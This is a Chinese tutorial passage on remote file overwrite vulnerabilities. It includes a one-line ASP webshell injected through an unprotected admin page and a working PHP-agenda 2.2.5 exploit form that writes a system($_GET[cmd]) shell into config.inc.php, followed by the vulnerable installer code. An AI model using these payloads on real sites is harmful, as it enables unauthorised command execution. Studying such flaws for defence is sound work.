[第29课]远程文件重写漏洞讲解.docVIP

远程文件重写漏洞讲解 这次课程说下针对远程文件重写的问题，其实简单来说，就是可以直接非授权修改配置文件或其他文件。 这种漏洞常常出现在安装文件、更新文件、访问配置文件的文件。 漏洞出现情况： 本应做访问权限限制的文件，没有添加访问限制代码，导致非授权访问。 未对用户输入有太多的想法导致远程重写。（这种漏洞的代码编写者对安全了解不够深入，并不知道凡是用户输入的都有可能是不安全的。） 由于变量未初始化导致远程文件重写。 简单就说这几种。其实这几种都有一个共同点就是都是写入文件的代码未授权或者没做限制导致的问题。 首先看第一个实例： 魅力企业网站管理系统 2009 SP3 中英繁漏洞漏洞作者：幻泉[B.S.N] 源码下载/soft/19655.htm 官方网站/ 漏洞等级：高 Google搜索：0351-6061896 漏洞说明： 防注入系统未设置登陆导致可以访问插入一句话 插入地址：/SqlIn/sqlIn_admin.asp?? 插入代码：:execute request(value):a= 信息来源：黑客防线 09.03.12 这个漏洞属于第一种漏洞情况的例子，本来应该对sqlln_admin.asp做访问限制的，但是并没有做，或者没有起作用导致可以写入。 接下来看一个国外代码的漏洞 Remote File Overwriting 他们叫这个名，中文翻译就是 “远程文件重写” ，废话不复制了，复制主要代码。 [-] Risk: hight [-] File affected: install.php This bug allows a guest to overwrite config.inc.php inserting PHP code. ************************************************* [+] Code - [A] Remote File Overwriting //这个代码就很简单了远程利用post提交“; system($_GET[cmd]); echo ”这个代码。跟前面插入的代码差不多，但是国外比较喜欢这种执行cmd命令的。你可以用你的代码进行替换 html headPHP-agenda = 2.2.5 - Remote File Overwriting/head body form action=/path/install.php method=post input type=text name=dbhost size=30 value=; system($_GET[cmd]); echo input type=submit value=Exploit! /form /body /head To execute commands: /path/config.inc.php?cmd=uname –a //然后就可以调用config.inc.php来写入了。 这里我给附加一个条件magic_quotes_gpc必须为off ************************************************* 我们再来看看他的代码： ?php include (adodb/adodb.inc.php); if (isset ($_POST[dbhost])) { //如果检测到变量dbhost则执行下面的代码，我们上面已经检测到了所以这里通过。 $data = ?php . \n\t; $data .= $dbhost=\ . $_POST[dbhost] . ;\n\t; //上是提交的这个 我们插入的代码就写入到这里了。 $data .= $dbname=\ . $_POST[dbname] . ;\n\t; $data .= $dbuser=\ . $_POST[dbuser] . ;\n\t; $data .= $dbpass=\ . $_POST[dbpass] . ;\n; $data .= define(DB_SERVER, $dbhost) . ;\n\t; $data .= define(DB_USER, $dbuser) . ;\n\t; $data .= define(DB_PASS, $dbpass) . ;\n\t; $data .= define(DB_NAME, $dbname) . ;\n\t; $data .= define(TBL_USERS, users) . ;\n\